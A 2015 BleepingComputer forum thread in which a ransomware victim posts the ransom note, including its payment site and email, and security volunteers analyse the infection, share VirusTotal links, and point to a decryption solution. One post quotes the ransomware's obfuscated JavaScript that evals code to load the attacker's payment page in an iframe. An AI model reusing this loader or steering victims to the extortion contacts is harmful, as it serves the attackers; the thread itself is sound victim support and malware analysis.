Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

All files encrypted


  • Please log in to reply
8 replies to this topic

#1 robbyrobby

robbyrobby

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:01:02 AM

Posted 03 May 2015 - 03:05 AM

all files encrypted with this message:
 
"Warning !! You have a computer found pirated content! All your files are encrypted! To decrypt files you need visit the site
http://utrozen.pixub.com and follow the instructions posted on it. If the site is for some reason unavailable
refer to the stoppirates@yahoo.com. Your id 335495.
 
You can enter a password 5 times. above this
limit, all files will be deleted! Independent attempts to decrypt the data can lead to Their loss. "
 
 
This virus has infected my coputer. This is the Trojan horse TR / Crypt.Xpack.171354.He has encrypted all files. Avira has found that this virus has encrypted my files.
I cleared the virus. But how do I decrypt files?
thanks
Rob


BC AdBot (Login to Remove)

 


#2 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,591 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:07:02 PM

Posted 03 May 2015 - 06:45 AM

The BC staff has advised our Security Colleagues who specialize in crypto malware ransomware with a link to this topic.

Please submit a sample of an encrypted file here: http://www.bleepingcomputer.com/submit-malware.php?channel=3
with a link to this topic.

You can also submit samples of suspicious executables or any malware files that you suspect were involved in causing the infection. Doing that will be helpful with analyzing and investigating.

These are common locations malicious executables may be found:
%Temp%
%AppData%
%LocalAppData%
%ProgramData%
%WinDir%
.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#3 White Hat Mike

White Hat Mike

  • Members
  • 312 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:::1
  • Local time:07:02 PM

Posted 03 May 2015 - 07:44 AM

If you can upload the binary to Mega and send me a link, I have a lot of time to review it today.

Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com


#4 robbyrobby

robbyrobby
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:01:02 AM

Posted 03 May 2015 - 08:17 AM

here is the link where you can download an image file encrypted

 

http://we.tl/1UyV4y0Ir2

 

thanks

rob

 



#5 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,614 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:07:02 PM

Posted 03 May 2015 - 09:04 AM

Do you happen to have a sample of the infector or know how you received it?

#6 White Hat Mike

White Hat Mike

  • Members
  • 312 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:::1
  • Local time:07:02 PM

Posted 03 May 2015 - 12:27 PM

Found a few VirusTotal analyses of several ransomware variants that I believe the topic starter has been infected with.

 

https://www.virustotal.com/en/file/60955c4a9effdafc1292072aa46c00cbad621753092df776526ce825a04784b7/analysis/

https://www.virustotal.com/en/file/334849263d928779c92fd3b6b2c006162c258a9351894f27ed19ebc3de80b689/analysis/

https://www.virustotal.com/en/file/af96ab7b714a96ca422746ba588167759c19dd8e07f78070937e8c5ad6950d41/analysis/

https://www.virustotal.com/en/file/b54c7af13b9efd9fe5a832aa52d221603ef4b02e841ef7e75d20db1d21081e98/analysis/

 

Really annoying that VirusTotal doesn't always (rarely does when I actually need it) provide the sample for download.

 

Found these samples after some brief recon using a source (sub)domain...  The ransom page displayed is actually an iframe containing content from an external domain.  The URL is obfuscated with two asterisks (**) representing the letter "t".  So...  not really obfuscated at all, ha.

 

The URL hosting the ransom payment page / instructions is below (edited for user safety).

 

hxxp://str.fulba.com/u4laglaqnm93fh/lending/US.php

Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com


#7 White Hat Mike

White Hat Mike

  • Members
  • 312 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:::1
  • Local time:07:02 PM

Posted 03 May 2015 - 12:40 PM

For anyone that wants a laugh, here's the Javascript used to print the iframe that contains the ransom/payment instructions...

 

str = 'documen**.wri**e(\'<iframe src="h****p://s**r.fulba.com/u4laglaqnm93fh/lending/**ds.php" wid**h="100%" heigh**="100%" frameborder="0" id="rform"><inpu** **ype="submi**"></iframe>\');documen**.ge**Elemen**ById(\'rform\').submi**();'
eval(str.split('**').join('t'));

Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com


#8 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,614 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:07:02 PM

Posted 04 May 2015 - 05:02 PM

If anyone is infected with this ransomware, please message me for a test.

#9 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,614 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:07:02 PM

Posted 05 May 2015 - 04:01 PM

Here ya go:

http://www.bleepingcomputer.com/forums/t/575324/international-police-association-sopa-pipa-ransomware-easily-decrypted/




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users